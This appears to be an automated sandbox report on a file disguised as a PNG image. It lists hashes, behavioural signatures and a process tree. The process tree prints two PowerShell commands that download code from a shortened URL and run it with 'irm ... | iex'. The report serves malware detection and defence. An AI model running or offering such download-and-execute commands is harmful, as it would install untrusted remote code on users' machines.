Analysis
-
max time kernel
93s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19/09/2024, 03:25
Static task
static1
Behavioral task
behavioral1
Sample
003e3738-4700-4df8-bbc0-fff3b1aff261-removebg-preview.png
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
003e3738-4700-4df8-bbc0-fff3b1aff261-removebg-preview.png
Resource
win10v2004-20240802-en
General
-
Target
003e3738-4700-4df8-bbc0-fff3b1aff261-removebg-preview.png
-
Size
167KB
-
MD5
516d13cbd3be8fa80932e7692ffc94d8
-
SHA1
af83170f239640cc10ad4f886e505e890af89615
-
SHA256
2bb051354e260e4e29a6a03f8270cd05f1546ed9781b1a3a2e8289fc5e8b748c
-
SHA512
8329e890c4182b108621099a6b5a4f6595626b7c43ff1e1cde6c3a4fb63a2fb8ecb412c47f5010d41bd218b579f5e6a2bbf2525449b81d9446739987dc9ba987
-
SSDEEP
3072:zaoOwRj+aWG3u+jlEB/am5i2vhwEA78cJwDjc2xwccNaIOBYjY8IiMeZrLI2fNQu:Wq+qjeUmMW+8xfn/cNaI9E8i4rU2VD
Malware Config
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 34 3716 powershell.exe 35 3716 powershell.exe 37 3716 powershell.exe 42 1620 powershell.exe 43 1620 powershell.exe 44 1620 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3716 powershell.exe 3716 powershell.exe 1620 powershell.exe 1620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3716 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1772 wrote to memory of 3716 1772 cmd.exe 99 PID 1772 wrote to memory of 3716 1772 cmd.exe 99 PID 1772 wrote to memory of 1620 1772 cmd.exe 100 PID 1772 wrote to memory of 1620 1772 cmd.exe 100
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\003e3738-4700-4df8-bbc0-fff3b1aff261-removebg-preview.png1⤵PID:3656
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell "irm shorturl.at/Peldl | iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell "irm shorturl.at/PeldI | iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f3f8be02b8064bf22cc00e558c40704a
SHA15c6a63375a3396fdee9ffbe906b47195f13a89b4
SHA25673606ba7e98faaff18974b983568e55d6a3b07e8469f2b06f5d765db87f40e07
SHA51224caeb058c651c9c1dd8ee7ea04384829355193a20e964c449ee69ae3bfde12e0916491adcd31a85f405e8afa6db30a05eca5f61d4a62041b55872013b776292
-
Filesize
1KB
MD56cca03238ac9b56b5e63c7352e50bd08
SHA16717605de5f1217d3f77a2144bab3bb2add8b51b
SHA256415c211028bf0a2308b8b2e87b2eab8240ae7386532772784abb22a0d1f10c0c
SHA5124bb2a873e17f7d37aebb5c43f4c1a4a706c10a77603211c70eda5a75f49d1076d7f00acca445f62810da2cab26ff0c5409d0cf7b98863819c2b3097a904dccb6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82